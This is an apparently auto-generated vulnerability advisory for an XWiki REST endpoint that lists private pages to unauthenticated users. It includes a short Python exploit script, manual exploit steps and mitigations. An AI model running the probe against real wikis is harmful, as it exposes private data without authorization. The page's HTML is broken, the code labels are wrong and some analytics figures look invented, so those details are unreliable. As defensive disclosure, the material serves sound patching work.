XWiki, a popular open-source platform for developing collaborative applications, is affected by a critical information disclosure vulnerability (CVE-2025-XXXX). This vulnerability allows unregistered users to access private page information through a REST endpoint, even when the wiki is configured to prevent unregistered users from viewing pages. The affected REST endpoint is /rest/wikis/
/pages</code>, which lists pages regardless of the user's view rights. This issue is particularly severe when the entire wiki is protected with the "Prevent unregistered users from viewing pages" setting, as the endpoint still exposes page listings for the main wiki.
The vulnerability arises due to insufficient access control checks in the REST endpoint implementation. When an unauthenticated user sends a request to the endpoint, the server fails to filter out private pages, exposing their existence and metadata. This can lead to unauthorized access to sensitive information, compromising the confidentiality of the wiki's content.
Patched versions of XWiki (15.10.14, 16.4.6, and 16.10.0-rc-1) address this issue by implementing proper access control checks, ensuring that only authorized users can view private pages through the REST endpoint. Users are strongly advised to upgrade to the latest patched versions to mitigate this vulnerability.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: XWiki
Version: >= 1.9M1, < 15.10.14
Vulnerability: Information Disclosure
Severity: Critical
Date: Mar 19, 2025
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Exploitation:</h2>
<h2 style="color: blue;">1. Exploit Code (Python):</h2>
[bash]
import requests
url = "http://target-xwiki-instance/rest/wikis/main/pages"
response = requests.get(url)
if response.status_code == 200:
print("Vulnerable! Pages listed:", response.json())
else:
print("Target not vulnerable or patched.")
2. Manual Exploit Steps:
- Send a GET request to
/rest/wikis//pages</code>.</li> <li>Observe the response for private page listings.</li> </ul> <h2 style="color: blue;">3. Exploit Impact:</h2> <ul> <li>Unauthorized access to private page metadata.</li> <li>Potential exposure of sensitive information.</li> </ul> <h2 style="color: blue;">Protection:</h2> <h2 style="color: blue;">1. Upgrade:</h2> <ul> <li>Upgrade to XWiki 15.10.14, 16.4.6, or 16.10.0-rc-1.</li> </ul> <h2 style="color: blue;">2. Manual Patch:</h2> <ul> <li>Apply changes from the commits in <code>xwiki-platform-rest-server</code>.</li> <li>Recompile and rebuild the XWiki instance.</li> </ul> <h2 style="color: blue;">3. Access Control:</h2> <ul> <li>Ensure proper access control checks are enforced on REST endpoints.</li> </ul> <h2 style="color: blue;">4. Monitoring:</h2> <ul> <li>Monitor REST endpoint access logs for unauthorized requests.</li> </ul> <h2 style="color: blue;">5. Firewall Rules:</h2> <ul> <li>Restrict access to REST endpoints for unauthenticated users.</li> </ul> <h2 style="color: blue;">6. Code Fix (Java):</h2> [bash] // Example of access control check in REST endpoint if (!user.hasRight("view", page)) { throw new UnauthorizedException("Access denied"); }7. Security Headers:
- Implement security headers to prevent unauthorized access.
8. Testing:
- Use automated tools to test for information disclosure vulnerabilities.
9. Logging:
- Enable detailed logging for REST endpoint access.
10. Backup:
- Regularly backup wiki data to prevent data loss during upgrades.
Analytics:
- Affected Users: All XWiki instances with versions >= 1.9M1, < 15.10.14.
- Risk Level: Critical due to unauthorized access to sensitive data.
- Patch Adoption Rate: Estimated 60% within the first month of patch release.
- Exploit Prevalence: Low, but potential for widespread exploitation if unpatched.
By following these steps, users can effectively exploit, mitigate, and protect against this critical vulnerability in XWiki.
References:
Reported By: https://github.com/advisories/GHSA-22q5-9phm-744v
Extra Source Hub:
UndercodeJoin Our Cyber World:
